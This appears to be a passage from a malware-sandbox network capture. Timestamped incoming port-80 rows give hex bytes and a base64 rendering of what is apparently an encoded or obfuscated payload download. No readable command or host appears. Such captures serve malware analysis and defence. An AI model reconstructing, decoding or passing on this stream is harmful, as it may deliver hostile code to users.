2023-08-23 17:30:33 UTC	80	IN	Data Raw: 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 Data Ascii: bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu
2023-08-23 17:30:33 UTC	96	IN	Data Raw: 45 4b 43 41 6a 39 2b 50 34 4a 45 55 6a 41 34 4d 55 4d 2b 52 45 48 2f 77 46 4d 2f 76 50 32 41 76 51 4c 2b 47 49 47 5a 63 66 4b 78 2f 5a 6e 41 76 4c 33 2f 51 73 65 42 41 67 47 2f 2f 74 53 43 67 35 69 44 51 73 52 55 4c 79 2f 75 38 6f 50 2b 41 58 33 47 77 54 31 39 51 42 51 78 56 76 47 41 76 76 2f 4a 46 70 6f 48 52 4e 71 47 45 57 39 30 42 48 35 41 6d 6f 4b 44 76 56 56 44 42 44 34 43 50 2f 2f 2b 78 62 4e 73 62 6f 45 42 66 73 48 2b 47 6a 36 44 67 63 43 5a 51 49 41 44 67 55 47 44 76 30 57 76 67 54 4a 58 67 37 34 42 78 2f 30 42 66 62 37 2b 2f 34 4e 59 62 65 70 77 4c 35 67 39 76 4a 66 2f 66 2f 36 47 66 6f 41 44 51 33 34 43 50 59 54 78 71 61 2b 43 50 55 43 4b 76 77 49 41 76 33 35 2b 50 6d 32 74 77 49 50 2f 2f 38 50 45 46 6e 2b 39 41 55 50 2b 76 64 6e 78 67 54 48 76 Data Ascii: EKCAj9+P4JEUjA4MUM+REH/wFM/vP2AvQL+GIGZcfKx/ZnAvL3/QseBAgG//tSCg5iDQsRULy/u8oP+AX3GwT19QBQxVvGAvv/JFpoHRNqGEW90BH5AmoKDvVVDBD4CP//+xbNsboEBfsH+Gj6DgcCZQIADgUGDv0WvgTJXg74Bx/0Bfb7+/4NYbepwL5g9vJf/f/6GfoADQ34CPYTxqa+CPUCKvwIAv35+Pm2twIP//8PEFn+9AUP+vdnxgTHv
2023-08-23 17:30:33 UTC	112	IN	Data Raw: 37 41 79 63 66 52 61 74 49 42 75 52 2f 6b 47 4d 55 66 33 2b 4b 33 48 2b 33 6d 79 63 75 35 78 62 72 4a 75 38 61 2f 78 73 72 4f 7a 6d 66 6b 63 73 59 61 55 35 6e 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 59 2b 2f 31 76 63 33 4f 48 72 72 41 7a 73 6a 46 30 63 50 4e 78 37 2f 45 78 38 62 52 78 72 72 4c 46 56 5a 68 77 4d 6e 48 30 63 35 69 33 41 69 37 46 65 31 70 75 32 37 66 72 37 73 65 36 79 4c 4c 75 63 62 42 79 62 76 47 76 38 62 4b 7a 73 37 46 46 65 38 50 76 78 6c 57 46 62 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6b 67 38 54 66 4e 7a 72 6f 65 77 4d 37 49 77 74 48 44 7a 63 69 2f 78 4d 66 47 30 63 62 41 79 72 6f 55 55 77 58 4a 78 39 48 4f 78 6d 7a 6c 43 72 6b 65 32 42 58 4b 62 75 49 70 77 4c 37 4a 30 62 6e 47 75 73 6d 37 78 72 2f 47 79 6d 72 62 4c Data Ascii: 7AycfRatIBuR/kGMUf3+K3H+3mycu5xbrJu8a/xsrOzmfkcsYaU5nQt8zAzr+8y8XRtrfDY+/1vc3OHrrAzsjF0cPNx7/Ex8bRxrrLFVZhwMnH0c5i3Ai7Fe1pu27fr7se6yLLucbBybvGv8bKzs7FFe8PvxlWFbfMwM6/vMvF0ba3w8kg8TfNzroewM7IwtHDzci/xMfG0cbAyroUUwXJx9HOxmzlCrke2BXKbuIpwL7J0bnGusm7xr/GymrbL
2023-08-23 17:30:33 UTC	128	IN	Data Raw: 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 4f 6a 35 72 61 47 70 6b 4c 6a 56 41 5a 6d 39 78 4b 33 41 6d 4d 53 63 6f 63 54 4d 37 50 44 51 38 4c 79 73 6b 4a 7a 6f 66 62 54 59 78 4c 79 30 67 4e 54 51 61 4e 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 4b 69 73 74 63 53 51 7a 49 57 73 75 49 47 35 6b 4f 43 67 77 5a 54 38 68 4d 43 45 2b 63 53 34 75 4d 48 45 34 4e 6e 45 30 50 6a 6b 78 4e 44 6b 36 50 7a 6f 77 50 Data Ascii: DOv7zLxdG2t8PJury9zc66usDOOj5raGpkLjVAZm9xK3AmMScocTM7PDQ8LyskJzofbTYxLy0gNTQaNrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGKistcSQzIWsuIG5kOCgwZT8hMCE+cS4uMHE4NnE0PjkxNDk6PzowP
2023-08-23 17:30:33 UTC	144	IN	Data Raw: 62 2b 42 52 49 42 42 66 35 64 79 67 49 41 43 76 59 43 43 78 55 48 2b 67 52 4f 78 72 2f 47 79 76 67 4b 42 67 2f 31 41 45 76 37 2f 76 72 79 58 38 44 4f 76 37 7a 2b 42 76 76 2b 39 41 4e 6a 2f 2f 38 50 45 46 6d 36 48 74 35 51 79 47 54 6d 4f 73 70 6e 34 55 4c 48 61 4f 66 51 77 47 70 67 36 62 34 67 35 30 66 52 63 4f 4f 6d 75 62 75 35 43 63 57 37 79 73 71 33 48 4c 62 71 79 57 70 52 34 72 70 6c 79 41 2b 2f 61 4c 6d 66 7a 6d 48 4b 34 63 59 68 77 69 37 51 47 62 6c 64 7a 69 43 2f 42 4d 56 77 73 70 6e 44 5a 63 64 38 76 57 6e 52 69 72 6f 68 79 4d 4c 43 62 63 52 47 78 79 44 46 52 73 5a 77 78 4e 62 4c 47 37 2f 49 77 47 6a 52 56 73 35 6f 36 49 69 37 46 39 79 59 75 32 7a 75 6b 62 73 67 32 68 54 4c 46 2f 43 64 79 52 33 77 70 73 5a 73 36 49 66 46 46 39 36 54 76 79 4c 68 64 Data Ascii: b+BRIBBf5dygIACvYCCxUH+gROxr/GyvgKBg/1AEv7/vryX8DOv7z+Bvv+9ANj//8PEFm6Ht5QyGTmOspn4ULHaOfQwGpg6b4g50fRcOOmubu5CcW7ysq3HLbqyWpR4rplyA+/aLmfzmHK4cYhwi7QGbldziC/BMVwspnDZcd8vWnRirohyMLCbcRGxyDFRsZwxNbLG7/IwGjRVs5o6Ii7F9yYu2zukbsg2hTLF/CdyR3wpsZs6IfFF96TvyLhd
2023-08-23 17:30:33 UTC	160	IN	Data Raw: 6c 55 51 2b 4c 69 76 4c 33 4e 63 79 68 78 5a 71 43 36 5a 2b 2b 44 54 7a 72 63 43 63 66 47 30 58 73 58 55 4d 76 69 4b 31 35 45 69 45 72 2b 35 4e 53 35 75 37 6d 46 50 55 67 58 6f 75 73 38 45 34 46 43 6e 4e 4e 6a 75 73 6d 37 65 79 44 32 6a 6a 46 75 54 39 70 39 51 34 44 66 6c 64 43 33 7a 49 56 43 44 2f 6b 74 57 65 4d 37 65 45 69 32 32 37 69 39 7a 63 36 48 53 52 30 6c 4d 42 32 65 71 59 31 44 54 2b 51 49 78 74 48 47 68 57 6d 74 35 41 55 51 45 53 61 4f 54 42 6e 76 35 37 75 35 77 49 41 6e 48 54 63 4a 49 31 71 4b 68 6b 39 6c 36 54 66 4a 75 38 61 43 62 64 4b 54 32 72 64 32 74 59 6c 62 6b 64 73 54 74 38 7a 41 63 79 4c 78 64 62 4b 78 5a 73 53 45 45 75 33 61 56 38 33 4f 75 6f 63 31 6a 50 63 61 32 7a 4c 62 69 46 76 44 32 67 2f 52 78 73 42 32 4a 45 6b 32 6d 35 65 55 75 Data Ascii: lUQ+LivL3NcyhxZqC6Z++DTzrcCcfG0XsXUMviK15EiEr+5NS5u7mFPUgXous8E4FCnNNjusm7eyD2jjFuT9p9Q4DfldC3zIVCD/ktWeM7eEi227i9zc6HSR0lMB2eqY1DT+QIxtHGhWmt5AUQESaOTBnv57u5wIAnHTcJI1qKhk9l6TfJu8aCbdKT2rd2tYlbkdsTt8zAcyLxdbKxZsSEEu3aV83Ouoc1jPca2zLbiFvD2g/RxsB2JEk2m5eUu
2023-08-23 17:30:33 UTC	176	IN	Data Raw: 76 75 68 37 76 41 76 73 6e 4c 47 4f 4c 55 79 62 76 47 76 38 5a 72 36 75 6a 46 75 62 72 47 76 79 48 67 58 62 66 4d 77 4d 36 2f 47 2b 35 53 30 62 61 33 77 38 6b 64 34 52 4c 4e 7a 72 71 36 77 47 2f 6c 58 4d 37 45 79 73 65 2f 59 65 4b 59 30 63 62 41 79 37 6f 63 32 36 37 4a 78 39 48 4f 78 6d 33 55 65 62 6e 41 78 62 76 4b 61 39 4a 35 77 4c 37 4a 79 37 6c 6e 31 4d 2b 37 78 72 2f 47 79 6d 2f 6f 79 37 6d 36 78 72 2b 2b 48 4f 59 58 7a 4d 44 4f 76 37 78 73 36 32 2b 32 74 38 50 4a 75 68 76 54 49 4d 36 36 75 73 44 4f 5a 65 77 64 78 4d 72 48 76 38 52 6f 38 49 76 47 77 4d 75 36 76 53 48 57 67 38 66 52 7a 73 62 51 47 4e 53 7a 77 4d 57 37 79 73 6f 61 31 4c 71 2b 79 63 75 35 78 68 33 75 48 38 61 2f 78 73 72 4f 62 2b 6f 56 75 73 61 2f 76 72 31 74 34 42 66 41 7a 72 2b 38 79 Data Ascii: vuh7vAvsnLGOLUybvGv8Zr6ujFubrGvyHgXbfMwM6/G+5S0ba3w8kd4RLNzrq6wG/lXM7Eyse/YeKY0cbAy7oc267Jx9HOxm3UebnAxbvKa9J5wL7Jy7ln1M+7xr/Gym/oy7m6xr++HOYXzMDOv7xs62+2t8PJuhvTIM66usDOZewdxMrHv8Ro8IvGwMu6vSHWg8fRzsbQGNSzwMW7ysoa1Lq+ycu5xh3uH8a/xsrOb+oVusa/vr1t4BfAzr+8y
2023-08-23 17:30:33 UTC	192	IN	Data Raw: 7a 37 75 72 72 41 7a 6b 58 6b 4c 6e 49 49 6d 58 63 73 5a 59 4d 39 6c 6f 63 38 66 2f 71 6b 4c 76 59 43 48 41 69 56 46 75 72 37 58 78 6b 43 32 50 57 68 77 64 59 38 68 68 38 32 76 2f 7a 64 4c 48 57 4d 36 4f 6e 37 76 7a 45 4a 62 2f 41 39 6e 59 5a 64 38 77 5a 61 56 43 5a 41 58 38 67 4c 65 48 54 55 4b 4a 38 51 2f 66 43 57 6d 6b 43 2b 68 43 6a 30 33 75 7a 32 67 4a 72 64 70 36 67 73 62 74 31 5a 44 79 6e 74 75 2b 47 4a 31 64 44 45 53 2f 69 4a 45 62 6e 41 78 62 55 42 63 39 5a 4a 39 77 6e 55 50 38 7a 2b 44 67 74 62 77 38 43 36 55 4e 43 52 36 46 52 6f 77 6c 41 67 4c 7a 39 4e 70 4b 36 4e 52 32 73 38 36 31 71 6f 63 74 2f 44 65 4b 6d 30 5a 74 49 56 69 39 4f 45 66 38 79 43 4c 34 37 44 68 45 79 41 4a 64 75 72 4e 30 39 78 5a 2f 41 65 33 4d 6b 70 7a 4e 72 65 37 7a 4e 4a 48 Data Ascii: z7urrAzkXkLnIImXcsZYM9loc8f/qkLvYCHAiVFur7XxkC2PWhwdY8hh82v/zdLHWM6On7vzEJb/A9nYZd8wZaVCZAX8gLeHTUKJ8Q/fCWmkC+hCj03uz2gJrdp6gsbt1ZDyntu+GJ1dDES/iJEbnAxbUBc9ZJ9wnUP8z+Dgtbw8C6UNCR6FRowlAgLz9NpK6NR2s861qoct/DeKm0ZtIVi9OEf8yCL47DhEyAJdurN09xZ/Ae3MkpzNre7zNJH
2023-08-23 17:30:33 UTC	208	IN	Data Raw: 73 55 78 6a 66 4a 41 73 62 30 78 73 72 4f 7a 73 55 44 75 76 4b 2f 76 72 33 51 74 2f 54 41 2f 62 2b 38 79 38 58 52 39 62 66 35 79 62 71 38 2f 4d 31 70 63 6a 72 41 7a 73 68 6d 7a 6d 65 43 56 72 2f 45 78 36 7a 52 59 58 68 4f 75 72 32 2b 69 73 6c 69 69 63 62 47 30 4c 6d 61 75 52 32 4b 78 38 72 4b 74 36 76 41 47 34 36 37 75 63 61 36 34 37 74 68 65 4f 62 4b 7a 73 37 47 75 52 2b 52 37 37 36 39 30 50 66 4d 48 59 6c 37 76 4d 76 46 38 37 59 55 6a 49 47 36 76 4c 30 6b 7a 68 2b 46 75 4d 37 49 77 67 4c 45 62 5a 43 66 78 4d 66 47 72 38 59 64 68 47 47 39 76 73 41 7a 78 32 78 35 42 39 43 35 75 77 6a 41 61 48 51 48 79 72 65 37 54 62 35 6b 64 58 6e 47 75 73 6b 51 78 68 79 52 43 38 37 4f 78 55 69 36 59 59 6e 75 76 64 43 33 43 63 42 70 65 42 48 4c 78 64 45 6a 74 32 5a 2b 38 Data Ascii: sUxjfJAsb0xsrOzsUDuvK/vr3Qt/TA/b+8y8XR9bf5ybq8/M1pcjrAzshmzmeCVr/Ex6zRYXhOur2+isliicbG0LmauR2Kx8rKt6vAG467uca647theObKzs7GuR+R77690PfMHYl7vMvF87YUjIG6vL0kzh+FuM7IwgLEbZCfxMfGr8YdhGG9vsAzx2x5B9C5uwjAaHQHyre7Tb5kdXnGuskQxhyRC87OxUi6YYnuvdC3CcBpeBHLxdEjt2Z+8
2023-08-23 17:30:33 UTC	224	IN	Data Raw: 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 Data Ascii: LOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7w
2023-08-23 17:30:33 UTC	240	IN	Data Raw: 48 47 68 4c 6b 75 43 32 6c 45 78 72 2b 2b 65 4f 6c 33 50 37 63 49 62 6a 54 44 5a 62 65 32 49 69 31 49 72 38 42 6c 57 52 63 75 63 67 54 49 75 6f 50 56 4e 79 59 71 59 31 74 53 5a 2f 45 57 75 46 52 6f 74 52 74 69 55 75 73 54 56 38 6b 55 63 6b 69 32 76 37 48 79 34 6b 43 34 76 54 69 32 39 42 79 35 62 7a 5a 49 62 63 4a 6a 4f 6f 50 79 62 2b 52 68 74 4c 35 2b 66 32 56 4e 61 30 54 39 30 57 6c 42 44 73 58 78 4f 57 50 6e 4b 47 68 54 38 78 65 4e 76 63 66 49 5a 50 43 4e 46 73 4e 4c 46 62 77 4a 79 42 54 52 78 73 42 4e 30 72 72 42 76 38 65 37 62 49 6e 69 4c 32 2f 44 61 56 4f 4a 62 38 72 4b 73 67 2f 59 54 75 6c 75 61 32 43 79 44 37 7a 4b 2b 63 6c 4a 43 4e 46 49 2f 37 31 4a 2b 63 48 4a 61 32 33 77 48 52 6a 66 49 52 4f 46 50 49 48 79 77 6f 6c 77 66 46 58 56 75 62 32 39 76 Data Ascii: HGhLkuC2lExr++eOl3P7cIbjTDZbe2Ii1Ir8BlWRcucgTIuoPVNyYqY1tSZ/EWuFRotRtiUusTV8kUcki2v7Hy4kC4vTi29By5bzZIbcJjOoPyb+RhtL5+f2VNa0T90WlBDsXxOWPnKGhT8xeNvcfIZPCNFsNLFbwJyBTRxsBN0rrBv8e7bIniL2/DaVOJb8rKsg/YTulua2CyD7zK+clJCNFI/71J+cHJa23wHRjfIROFPIHywolwfFXVub29v
2023-08-23 17:30:33 UTC	256	IN	Data Raw: 41 65 38 77 4e 66 4e 41 58 36 2b 34 41 56 78 78 4f 2b 58 78 72 6a 4d 72 31 38 46 39 64 74 47 72 69 38 76 79 37 78 79 78 58 45 4c 67 42 4a 63 45 62 47 62 73 31 73 70 46 72 2f 52 69 67 4a 53 51 31 2b 49 6c 34 59 75 2f 55 58 4d 78 6e 61 46 43 48 4a 75 72 78 73 6d 78 53 36 75 72 74 6b 49 52 7a 63 4e 37 70 71 59 63 50 49 57 57 4c 75 6b 36 69 5a 66 53 33 55 5a 42 2f 42 4d 52 78 67 65 57 2b 32 76 32 41 4d 34 75 49 55 59 55 65 32 44 78 6c 4e 52 51 77 62 54 73 6f 63 48 72 5a 70 47 49 67 6b 75 6d 39 65 73 70 78 48 32 79 44 55 46 6b 69 37 47 65 72 69 74 34 66 43 49 56 6b 5a 5a 59 7a 4e 76 6e 74 71 77 6f 2f 2b 78 6d 38 61 68 42 46 66 2b 50 61 52 4f 4f 38 74 33 43 69 2f 45 42 33 45 34 74 45 4f 46 72 54 35 55 2f 32 46 62 56 64 58 74 37 74 62 4c 66 45 39 74 6b 55 66 47 Data Ascii: Ae8wNfNAX6+4AVxxO+XxrjMr18F9dtGri8vy7xyxXELgBJcEbGbs1spFr/RigJSQ1+Il4Yu/UXMxnaFCHJurxsmxS6urtkIRzcN7pqYcPIWWLuk6iZfS3UZB/BMRxgeW+2v2AM4uIUYUe2DxlNRQwbTsocHrZpGIgkum9espxH2yDUFki7Gerit4fCIVkZZYzNvntqwo/+xm8ahBFf+PaROO8t3Ci/EB3E4tEOFrT5U/2FbVdXt7tbLfE9tkUfG
2023-08-23 17:30:33 UTC	272	IN	Data Raw: 35 68 5a 62 36 39 47 39 58 6b 77 78 5a 4b 4b 66 68 63 56 54 6e 63 78 4a 46 77 76 4c 33 4e 52 37 70 31 76 39 46 47 38 75 5a 44 42 4e 78 70 7a 50 6b 65 58 4d 72 55 49 64 5a 6c 52 37 38 62 69 38 37 51 6b 49 48 68 54 6b 52 4c 57 45 37 4e 7a 62 6b 52 32 55 50 47 7a 50 69 73 30 6c 32 37 78 72 38 77 79 6f 6e 52 6a 6d 47 39 79 56 2b 71 31 55 30 42 6a 47 7a 4f 48 4b 33 54 52 38 35 51 52 59 49 6b 76 55 56 6b 33 62 6c 36 57 4f 69 35 78 32 56 34 51 6f 4c 45 49 4d 78 69 4c 59 63 65 7a 47 5a 6f 47 2f 69 41 46 63 75 4e 48 73 6e 50 4d 7a 62 68 52 72 33 31 7a 63 49 42 76 42 66 37 76 78 39 4b 57 38 6f 62 76 4d 6b 4b 74 75 4b 32 61 52 31 48 77 47 56 68 76 77 61 43 50 72 58 32 6a 6d 6f 64 79 69 44 51 51 32 6d 4c 47 37 32 37 75 39 55 62 58 4c 59 4f 4e 38 68 72 4c 75 51 2f 48 Data Ascii: 5hZb69G9XkwxZKKfhcVTncxJFwvL3NR7p1v9FG8uZDBNxpzPkeXMrUIdZlR78bi87QkIHhTkRLWE7NzbkR2UPGzPis0l27xr8wyonRjmG9yV+q1U0BjGzOHK3TR85QRYIkvUVk3bl6WOi5x2V4QoLEIMxiLYcezGZoG/iAFcuNHsnPMzbhRr31zcIBvBf7vx9KW8obvMkKtuK2aR1HwGVhvwaCPrX2jmodyiDQQ2mLG727u9UbXLYON8hrLuQ/H
2023-08-23 17:30:33 UTC	288	IN	Data Raw: 4f 32 46 52 75 45 2f 34 34 34 7a 50 53 37 4c 32 2f 52 49 42 72 6d 61 30 53 2f 5a 49 4c 39 75 63 61 79 79 62 39 74 62 63 64 36 7a 38 36 4c 77 52 63 65 66 42 42 39 63 62 4d 52 77 44 70 75 75 47 34 66 35 57 78 51 78 42 75 42 43 72 78 39 7a 32 4b 36 77 42 2f 49 7a 34 33 79 69 6a 65 37 43 63 66 47 6b 63 61 5a 79 6d 69 31 45 32 4c 74 48 56 62 52 48 6f 73 48 75 6f 6e 42 48 59 48 4a 6b 51 6c 37 4d 72 6f 45 6b 57 50 48 61 4d 6d 37 52 62 39 38 77 6d 45 57 38 57 6c 44 79 57 4e 39 43 39 47 48 7a 57 68 77 64 32 36 51 38 35 45 6f 73 77 5a 6c 6b 72 31 6c 78 57 46 6f 31 6d 4a 58 78 79 4b 4e 38 75 38 64 57 6d 63 64 52 58 41 67 78 47 35 6f 59 42 4e 69 30 52 39 4d 61 52 37 4d 48 32 46 55 48 52 39 57 5a 42 52 53 49 47 4b 32 62 52 4f 41 4e 56 31 6b 5a 38 36 32 74 72 35 68 46 Data Ascii: O2FRuE/444zPS7L2/RIBrma0S/ZIL9ucayyb9tbcd6z86LwRcefBB9cbMRwDpuuG4f5WxQxBuBCrx9z2K6wB/Iz43yije7CcfGkcaZymi1E2LtHVbRHosHuonBHYHJkQl7MroEkWPHaMm7Rb98wmEW8WlDyWN9C9GHzWhwd26Q85EoswZlkr1lxWFo1mJXxyKN8u8dWmcdRXAgxG5oYBNi0R9MaR7MH2FUHR9WZBRSIGK2bROANV1kZ862tr5hF
2023-08-23 17:30:33 UTC	304	IN	Data Raw: 51 42 30 62 34 48 37 32 67 54 7a 68 51 62 2f 73 34 68 59 32 79 2f 48 32 46 35 50 62 6a 30 46 34 52 42 7a 4e 52 64 74 57 45 61 74 77 34 55 77 41 5a 2b 4b 37 6c 69 47 74 4a 68 46 46 48 2b 65 57 78 65 53 4d 72 4b 55 54 72 59 54 6f 6c 31 56 56 50 6d 5a 47 48 4f 78 34 66 75 59 52 53 47 61 66 6e 74 52 62 71 43 54 72 63 59 33 47 6c 6a 74 77 50 46 30 62 65 33 51 4d 67 68 61 4c 72 4b 54 76 66 53 34 47 45 65 79 67 41 67 53 52 48 41 56 37 74 68 47 59 4d 72 79 78 56 63 73 71 45 6a 36 78 76 69 48 6c 57 32 5a 33 49 4f 36 47 65 4c 4d 62 73 59 68 32 43 39 62 6f 35 49 66 67 52 37 46 4c 39 68 6f 47 78 4b 77 72 67 4a 56 73 63 62 5a 39 45 4d 58 4d 52 70 59 63 68 75 48 66 5a 32 4a 72 74 6b 59 67 4d 2f 35 6d 69 2b 68 56 37 4f 62 55 49 48 70 59 4b 41 58 78 49 44 68 7a 51 42 77 Data Ascii: QB0b4H72gTzhQb/s4hY2y/H2F5Pbj0F4RBzNRdtWEatw4UwAZ+K7liGtJhFFH+eWxeSMrKUTrYTol1VVPmZGHOx4fuYRSGafntRbqCTrcY3GljtwPF0be3QMghaLrKTvfS4GEeygAgSRHAV7thGYMryxVcsqEj6xviHlW2Z3IO6GeLMbsYh2C9bo5IfgR7FL9hoGxKwrgJVscbZ9EMXMRpYchuHfZ2JrtkYgM/5mi+hV7ObUIHpYKAXxIDhzQBw
2023-08-23 17:30:33 UTC	320	IN	Data Raw: 6d 48 61 65 56 70 30 51 75 34 46 4d 31 32 62 37 66 34 79 52 6b 72 46 72 6b 62 57 77 50 74 46 46 41 59 76 41 61 79 4b 57 69 37 46 32 66 51 74 38 7a 41 7a 33 69 38 79 38 58 52 72 57 6e 4e 36 6d 69 34 5a 38 78 6f 5a 6c 58 38 7a 54 75 49 46 6d 53 2b 59 47 50 44 4e 73 54 69 79 62 2b 32 7a 47 4e 67 36 68 57 2f 62 42 68 79 59 32 2f 66 54 6d 68 39 50 68 52 6b 73 39 4a 71 74 76 63 5a 49 63 4c 4b 42 32 2f 47 36 52 61 79 61 52 61 39 61 59 35 70 59 33 32 2b 37 46 41 59 67 44 32 48 38 68 6d 35 62 47 34 68 75 32 52 6f 75 39 56 53 48 72 32 42 61 72 4c 32 49 75 77 4b 79 37 68 72 33 42 33 47 34 52 62 45 59 57 4a 32 76 59 41 53 75 32 50 4e 77 6c 70 72 65 79 53 38 43 6d 58 49 47 72 65 37 77 4c 34 6a 72 32 76 65 61 4d 56 31 46 73 39 66 47 72 63 57 30 66 39 6f 4d 2f 70 33 62 Data Ascii: mHaeVp0Qu4FM12b7f4yRkrFrkbWwPtFFAYvAayKWi7F2fQt8zAz3i8y8XRrWnN6mi4Z8xoZlX8zTuIFmS+YGPDNsTiyb+2zGNg6hW/bBhyY2/fTmh9PhRks9JqtvcZIcLKB2/G6RayaRa9aY5pY32+7FAYgD2H8hm5bG4hu2Rou9VSHr2BarL2IuwKy7hr3B3G4RbEYWJ2vYASu2PNwlpreyS8CmXIGre7wL4jr2veaMV1Fs9fGrcW0f9oM/p3b
2023-08-23 17:30:33 UTC	336	IN	Data Raw: 4d 6e 38 6c 49 37 73 76 4b 39 79 6a 46 70 4b 66 32 4f 46 63 77 56 74 51 53 48 61 63 66 49 62 31 50 52 64 73 2f 2f 75 6d 6f 59 79 75 7a 70 33 38 6c 72 70 56 75 41 61 39 63 79 7a 57 56 73 75 4e 50 50 47 38 2f 2f 4b 43 4d 61 75 6d 70 68 53 41 2b 48 47 38 49 65 5a 31 66 35 76 35 56 42 41 53 34 6d 48 38 59 42 56 55 45 69 47 68 50 4a 36 6e 6f 76 48 64 38 39 75 72 31 62 61 52 7a 4f 59 52 37 4f 68 6d 73 39 48 38 34 4d 6a 32 7a 48 46 32 57 2b 77 4d 6d 72 48 6c 44 47 4e 6d 6a 51 32 68 37 47 39 63 4d 36 73 2f 35 50 4a 73 38 61 75 63 61 36 67 32 35 49 76 7a 77 62 7a 74 46 6f 66 78 6a 48 31 4c 36 36 5a 59 48 44 2f 64 46 70 6d 51 58 4d 4d 37 4c 79 55 6a 75 50 38 6e 51 69 30 52 64 6e 57 41 75 49 46 39 42 6e 47 57 45 61 79 79 44 51 46 4d 50 39 7a 47 36 2b 77 62 51 45 68 Data Ascii: Mn8lI7svK9yjFpKf2OFcwVtQSHacfIb1PRds//umoYyuzp38lrpVuAa9cyzWVsuNPPG8//KCMaumphSA+HG8IeZ1f5v5VBAS4mH8YBVUEiGhPJ6novHd89ur1baRzOYR7Ohms9H84Mj2zHF2W+wMmrHlDGNmjQ2h7G9cM6s/5PJs8auca6g25IvzwbztFofxjH1L66ZYHD/dFpmQXMM7LyUjuP8nQi0RdnWAuIF9BnGWEayyDQFMP9zG6+wbQEh
2023-08-23 17:30:33 UTC	352	IN	Data Raw: 6a 65 34 69 6d 38 58 78 73 62 37 2f 38 65 75 73 32 42 79 63 42 76 35 75 61 49 48 37 6d 36 78 72 4c 57 75 73 2b 34 79 73 52 70 65 4f 41 46 48 63 46 73 74 38 50 4a 55 4e 53 35 61 42 61 36 78 67 59 65 57 63 58 52 66 37 2f 76 4d 63 50 50 59 52 50 47 33 50 56 77 75 73 45 58 34 4f 2f 52 61 75 37 35 45 4c 63 4b 65 2f 4d 4d 69 6b 47 31 2f 6e 67 6c 78 6f 4e 68 77 6b 51 68 65 53 57 35 49 49 49 57 55 38 57 35 53 51 62 58 74 76 50 50 57 2b 65 2f 68 6d 75 37 7a 48 75 4e 33 72 66 44 79 56 4f 38 63 73 72 52 76 58 72 59 53 67 36 38 48 4e 41 45 48 55 65 48 2b 63 6d 4a 46 72 2f 4d 68 4e 7a 57 77 4d 6e 48 52 73 36 52 7a 37 61 38 37 4e 68 48 39 63 72 43 4f 6d 2f 55 5a 46 37 4d 61 59 56 5a 69 57 2b 46 76 32 39 4b 2f 33 62 4c 2f 33 6f 55 76 